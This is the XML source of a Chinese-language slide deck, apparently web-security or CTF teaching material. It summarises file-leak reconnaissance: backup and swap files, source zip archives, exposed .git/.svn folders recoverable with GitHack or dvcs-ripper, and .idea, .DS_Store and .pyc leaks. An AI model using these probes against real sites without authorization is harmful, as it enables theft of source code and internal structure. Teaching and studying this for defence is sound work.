              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Safari/601.1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC0DCBE6-BD39-0941-A596-DF20E592E424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949440" y="3916680"/>
            <a:ext cx="3581400" cy="6553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8390345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7223760" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>查看请求响应包（开发者工具栏）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F66D7B8-8225-C44E-B0DD-695A20CBBFBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="934720" y="1718825"/>
            <a:ext cx="10114280" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>Chome:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t> 右键检查，或者</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>F12/Win</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t> option(alt)+command+i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>/Mac</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA174828-5215-114F-A5CF-5C4EB7B003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7560" y="2356824"/>
            <a:ext cx="7848600" cy="4118994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="829218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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>文件泄露总结</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F66D7B8-8225-C44E-B0DD-695A20CBBFBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871220" y="1710907"/>
            <a:ext cx="10861040" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t> 备份文件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>.index.php.swp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t> .index.php.swo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t> .index.php.bak</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>.index.php~</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA026B96-AEB7-D449-9302-D6F2703FEEDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="6858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2301240" y="2369065"/>
            <a:ext cx="7396662" cy="4367015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127389116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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>文件泄露总结</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F66D7B8-8225-C44E-B0DD-695A20CBBFBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871220" y="1710907"/>
            <a:ext cx="10861040" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t> 源码压缩包</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>www.zip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>root.zip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>web.zip</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D0E4428-8167-B74F-80DF-2F8D8FB6D8C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="1168"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463040" y="2481590"/>
            <a:ext cx="9032240" cy="4005569"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199575733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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>文件泄露总结</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F66D7B8-8225-C44E-B0DD-695A20CBBFBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871220" y="1710907"/>
            <a:ext cx="10861040" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>svn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6770CA23-D476-1A4C-90AF-4AD00070C184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="498" t="3003" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1615440" y="2484120"/>
            <a:ext cx="9132570" cy="3716470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19019232-0481-694C-9DE9-5BA95433FF45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463040" y="5831258"/>
            <a:ext cx="9284970" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用工具：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GitHack</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dvcs-ripper</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，可以获取网站源码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400575550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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>文件泄露总结</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F66D7B8-8225-C44E-B0DD-695A20CBBFBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871220" y="1710907"/>
            <a:ext cx="10861040" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t> 其它文件泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19019232-0481-694C-9DE9-5BA95433FF45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1203960" y="2369064"/>
            <a:ext cx="9284970" cy="1369799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.idea</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目录泄露（使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>intellij idea</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的工程，可泄露目录结构）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2200" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.DS_Store</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下，可泄露文件）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2200" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.pyc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编译后的字节码文件）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339027348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7152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387" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>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791510" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3766432" y="1079555"/>
            <a:ext cx="4549480" cy="988629"/>
            <a:chOff x="3974544" y="1008636"/>
            <a:chExt cx="3412110" cy="741472"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11" name="组合 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3974544" y="1008636"/>
              <a:ext cx="741472" cy="741472"/>
              <a:chOff x="3059832" y="3339719"/>
              <a:chExt cx="3607562" cy="3607562"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="椭圆 16"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3059832" y="3339719"/>
                <a:ext cx="3607562" cy="3607562"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">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17307F"/>
                  </a:solidFill>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="同心圆 69"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3168202" y="3448089"/>
                <a:ext cx="3390826" cy="3390826"/>
              </a:xfrm>
              <a:prstGeom prst="donut">
                <a:avLst>
